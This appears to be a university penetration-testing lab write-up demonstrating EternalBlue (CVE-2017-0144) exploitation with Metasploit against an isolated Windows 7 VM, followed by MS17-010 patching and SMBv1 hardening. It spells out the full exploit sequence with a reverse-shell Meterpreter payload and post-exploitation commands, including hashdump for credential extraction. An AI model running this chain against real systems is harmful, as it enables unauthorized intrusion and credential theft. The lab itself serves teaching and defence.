Share
## https://sploitus.com/exploit?id=6A8FA72A-E9AB-5A75-A2EC-999C2C0750F2
# EternalBlue-DoublePulsar-Exploit-Demonstration
Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.

**Module:** CSCM828 Security Vulnerabilities and Penetration Testing
**Students:**

* Daniel Nicolas Rentapalli (2548048)
* Ichhya Koirala (2607189)
**University:** Swansea University
  

---

## 1. Overview

This demonstration showcases the exploitation of **CVE-2017-0144 (EternalBlue)** against a vulnerable Windows system, resulting in **unauthenticated remote code execution at kernel level (ring-0)**.

The exploit is executed using the Metasploit Framework and results in the installation of the **DoublePulsar kernel implant**, followed by delivery of a Meterpreter payload.

The demonstration also includes:

* Vulnerability verification
* Successful exploitation
* Post-exploitation activities
* Patch application (MS17-010)
* Exploit failure after patching

---

## 2. System Requirements

### Host System

* VMware Workstation / VirtualBox
* Minimum 8GB RAM recommended

### Attacker Machine

* Kali Linux 2024
* Metasploit Framework 6.x

### Victim Machine

* Windows 7 SP1 x64 (Build 7601)
* **Unpatched (MS17-010 NOT installed)**

---

## 3. Network Configuration

* Network Type: **Host-Only Network**
* Subnet: `192.168.139.0/24`

| Machine            | IP Address      |
| ------------------ | --------------- |
| Attacker (Kali)    | 192.168.139.128 |
| Victim (Windows 7) | 192.168.139.131 |

โš ๏ธ No internet connectivity is required.
โš ๏ธ Environment is fully isolated for ethical compliance.

---

## 4. Victim Setup (Windows 7)

Run the following commands in **Administrator Command Prompt**:

### Disable Firewall

```
netsh advfirewall set allprofiles state off
```

### Verify Firewall Status

```
netsh advfirewall show allprofiles | findstr State
```

### Confirm SMB (Port 445)

```
netstat -an | findstr :445
sc query lanmanserver
```

### Disable Windows Updates

```
sc config wuauserv start= disabled
sc stop wuauserv
```

### Set Static IP

```
netsh interface ip set address "Local Area Connection" static 192.168.139.131 255.255.255.0
```

### Connectivity Test

```
ping 192.168.139.128
```

๐Ÿ“Œ Take a snapshot named: **Vulnerable-PreExploit**

---

## 5. Attacker Setup (Kali Linux)

### Assign IP Address

```
sudo ip addr add 192.168.139.128/24 dev eth0
sudo ip link set eth0 up
```

### Update Metasploit

```
sudo apt update && sudo msfupdate
```

### Verify Connectivity

```
ping 192.168.139.131
nmap -p 445 192.168.139.131
```

---

## 6. Exploitation Steps

### Step 1: Vulnerability Scan

```
nmap -p 445 --script smb-vuln-ms17-010 192.168.139.131
```

Expected result:

* Host marked **VULNERABLE**

---

### Step 2: Launch Exploit

```
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.139.131
set LHOST 192.168.139.128
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
run
```

---

### Step 3: Successful Exploitation

Expected output:

* Meterpreter session opened
* SYSTEM-level access

```
meterpreter > getuid
NT AUTHORITY\SYSTEM
```

---

## 7. DoublePulsar Verification

```
background
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.139.131
run
```

Expected result:

* Host INFECTED
* XOR Key displayed

---

## 8. Post-Exploitation

```
sessions -i 1
getuid
hashdump
ps
migrate 
screenshot
shell
whoami
net user
ipconfig /all
```

Demonstrates:

* Credential extraction
* Process migration
* System enumeration

---

## 9. Patch Demonstration (Mitigation)

### Revert Snapshot

Restore: **Vulnerable-PreExploit**

---

### Install Patch (MS17-010)

```
wusa.exe KB4012212-x64.msu /quiet /norestart
shutdown /r /t 0
```

---

### Re-run Exploit

Expected result:

* Exploit fails
* No session created

---

### Verify Patch

```
nmap -p 445 --script smb-vuln-ms17-010 192.168.139.131
```

Expected:

* NOT VULNERABLE

---

## 10. Optional Hardening

### Disable SMBv1

```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v SMB1 /t REG_DWORD /d 0 /f
```

---

## 11. Troubleshooting

| Issue                | Solution                 |
| -------------------- | ------------------------ |
| Exploit fails        | Check IP configuration   |
| No session           | Ensure firewall disabled |
| Scan not working     | Confirm port 445 open    |
| Meterpreter unstable | Retry exploit            |

---

## 12. Ethical Considerations

This demonstration is conducted:

* On **author-owned systems only**
* In a **fully isolated lab environment**
* With **no external network access**

Unauthorized exploitation of systems is illegal under:

* UK Computer Misuse Act 1990

---

## 13. Summary

This lab demonstrates:

* Kernel-level exploitation via EternalBlue
* Fileless persistence using DoublePulsar
* Real-world attack replication (WannaCry-style)
* Effective mitigation via patching

---

END OF FILE